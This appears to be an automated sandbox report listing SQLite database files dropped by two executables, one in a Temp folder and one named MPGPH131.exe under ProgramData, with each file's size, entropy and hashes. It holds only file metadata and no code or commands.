                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ...................&...................K..................................j.....-a>.~...|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.8439810553697228
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO9p7n52GmCWGf+dyMDCFVE1:TeAFawNLopFgU10XJBOB2Gbf+ba+
                                                                                                                                                                                                                                      MD5:9D46F142BBCF25D0D495FF1F3A7609D3
                                                                                                                                                                                                                                      SHA1:629BD8CD800F9D5B078B5779654F7CBFA96D4D4E
                                                                                                                                                                                                                                      SHA-256:C11B443A512184E82D670BA6F7886E98B03C27CC7A3CEB1D20AD23FCA1DE57DA
                                                                                                                                                                                                                                      SHA-512:AC90306667AFD38F73F6017543BDBB0B359D79740FA266F587792A94FDD35B54CCE5F6D85D5F6CB7F4344BEDAD9194769ABB3864AAE7D94B4FD6748C31250AC2
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.5394293526345721
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:AquejzH+bF+UIYysX0IxQzh/tsV0NifLjLqLy0e9S8E:AqtH+bF+UI3iN0RSV0k3qLyj9
                                                                                                                                                                                                                                      MD5:52701A76A821CDDBC23FB25C3FCA4968
                                                                                                                                                                                                                                      SHA1:440D4B5A38AF50711C5E6C6BE22D80BC17BF32DE
                                                                                                                                                                                                                                      SHA-256:D602B4D0B3EB9B51535F6EBA33709DCB881237FA95C5072CB39CECF0E06A0AC4
                                                                                                                                                                                                                                      SHA-512:2653C8DB9C20207FA7006BC9C63142B7C356FB9DC97F9184D60C75D987DC0848A8159C239E83E2FC9D45C522FEAE8D273CDCD31183DED91B8B587596183FC000
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                      Entropy (8bit):0.6732424250451717
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                                                                                                                                      MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                                                                                                                                      SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                                                                                                                                      SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                                                                                                                                      SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1000056001\c884f8452a.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.7363857395593286
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Qg4i9gtH+bF+UI3iN0RSV0k3qLyj9Ho+A:9qtIkUI3iGRE3qLOo
                                                                                                                                                                                                                                      MD5:D10634E34CE24D7E45EEC3D4E6A53D23
                                                                                                                                                                                                                                      SHA1:4055556257F379571D93F669B1E20EE06D45E86A
                                                                                                                                                                                                                                      SHA-256:272B3B7D55B02541C0E683F09CF47349B26A80FB27B01D060D86DFEAF8DC86D5
                                                                                                                                                                                                                                      SHA-512:3B7FFB113272E0DC0D3E55F1E53A09E5613FA3DFE5D9BDA41CE0F5FECDCB3731742F0EC7B012E5CEFE7B7F1823754CA819802F75337C792DEFCECD2E3BD376F9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):51200
                                                                                                                                                                                                                                      Entropy (8bit):0.8746135976761988
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                                                                                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                                                                                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                                                                                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                                                                                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:96:OgWyejzH+bDoYysX0IxQzZkHtpVJNlYDLjGQLBE3CeE0kE:OJhH+bDo3iN0Z2TVJkXBBE3yb
                                                                                                                                                                                                                                      MD5:7B955D976803304F2C0505431A0CF1CF
                                                                                                                                                                                                                                      SHA1:E29070081B18DA0EF9D98D4389091962E3D37216
                                                                                                                                                                                                                                      SHA-256:987FB9BFC2A84C4C605DCB339D4935B52A969B24E70D6DEAC8946BA9A2B432DC
                                                                                                                                                                                                                                      SHA-512:CE2F1709F39683BE4131125BED409103F5EDF1DED545649B186845817C0D69E3D0B832B236F7C4FC09AB7F7BB88E7C9F1E4F7047D1AF56D429752D4D8CBED47A
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                      Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                      MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                      SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                      SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                      SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):5242880
                                                                                                                                                                                                                                      Entropy (8bit):0.03859996294213402
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:58rJQaXoMXp0VW9FxWHxDSjENbx56p3DisuwAyHI:58r54w0VW3xWdkEFxcp3y/y
                                                                                                                                                                                                                                      MD5:D2A38A463B7925FE3ABE31ECCCE66ACA
                                                                                                                                                                                                                                      SHA1:A1824888F9E086439B287DEA497F660F3AA4B397
                                                                                                                                                                                                                                      SHA-256:474361353F00E89A9ECB246EC4662682392EBAF4F2A4BE9ABB68BBEBE33FA4A0
                                                                                                                                                                                                                                      SHA-512:62DB46A530D952568EFBFF7796106E860D07754530B724E0392862EF76FDF99043DA9538EC0044323C814DF59802C3BB55454D591362CB9B6E39947D11E981F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 8
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):196608
                                                                                                                                                                                                                                      Entropy (8bit):1.121297215059106
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:384:72qOB1nxCkvSAELyKOMq+8yC8F/YfU5m+OlT:qq+n0E9ELyKOMq+8y9/Ow
                                                                                                                                                                                                                                      MD5:D87270D0039ED3A5A72E7082EA71E305
                                                                                                                                                                                                                                      SHA1:0FBACFA8029B11A5379703ABE7B392C4E46F0BD2
                                                                                                                                                                                                                                      SHA-256:F142782D1E80D89777EFA82C9969E821768DE3E9713FC7C1A4B26D769818AAAA
                                                                                                                                                                                                                                      SHA-512:18BB9B498C225385698F623DE06F93F9CFF933FE98A6D70271BC6FA4F866A0763054A4683B54684476894D9991F64CAC6C63A021BDFEB8D493310EF2C779638D
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.7363857395593286
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Qg4i9gtH+bF+UI3iN0RSV0k3qLyj9Ho+A:9qtIkUI3iGRE3qLOo
                                                                                                                                                                                                                                      MD5:D10634E34CE24D7E45EEC3D4E6A53D23
                                                                                                                                                                                                                                      SHA1:4055556257F379571D93F669B1E20EE06D45E86A
                                                                                                                                                                                                                                      SHA-256:272B3B7D55B02541C0E683F09CF47349B26A80FB27B01D060D86DFEAF8DC86D5
                                                                                                                                                                                                                                      SHA-512:3B7FFB113272E0DC0D3E55F1E53A09E5613FA3DFE5D9BDA41CE0F5FECDCB3731742F0EC7B012E5CEFE7B7F1823754CA819802F75337C792DEFCECD2E3BD376F9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):40960
                                                                                                                                                                                                                                      Entropy (8bit):0.8553638852307782
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                                                                                                                                      MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                                                                                                                                      SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                                                                                                                                      SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                                                                                                                                      SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 2, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 2
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):159744
                                                                                                                                                                                                                                      Entropy (8bit):0.7363857395593286
                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                      SSDEEP:192:Qg4i9gtH+bF+UI3iN0RSV0k3qLyj9Ho+A:9qtIkUI3iGRE3qLOo
                                                                                                                                                                                                                                      MD5:D10634E34CE24D7E45EEC3D4E6A53D23
                                                                                                                                                                                                                                      SHA1:4055556257F379571D93F669B1E20EE06D45E86A
                                                                                                                                                                                                                                      SHA-256:272B3B7D55B02541C0E683F09CF47349B26A80FB27B01D060D86DFEAF8DC86D5
                                                                                                                                                                                                                                      SHA-512:3B7FFB113272E0DC0D3E55F1E53A09E5613FA3DFE5D9BDA41CE0F5FECDCB3731742F0EC7B012E5CEFE7B7F1823754CA819802F75337C792DEFCECD2E3BD376F9
                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                      Process:C:\ProgramData\MPGPH131\MPGPH131.exe
                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 38, cookie 0x1f, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                      Size (bytes):155648
                                                                                                                                                                                                                                      Entropy (8bit):0.5407252242845243
                                                                                                                                                                                                                                      Encrypted:false
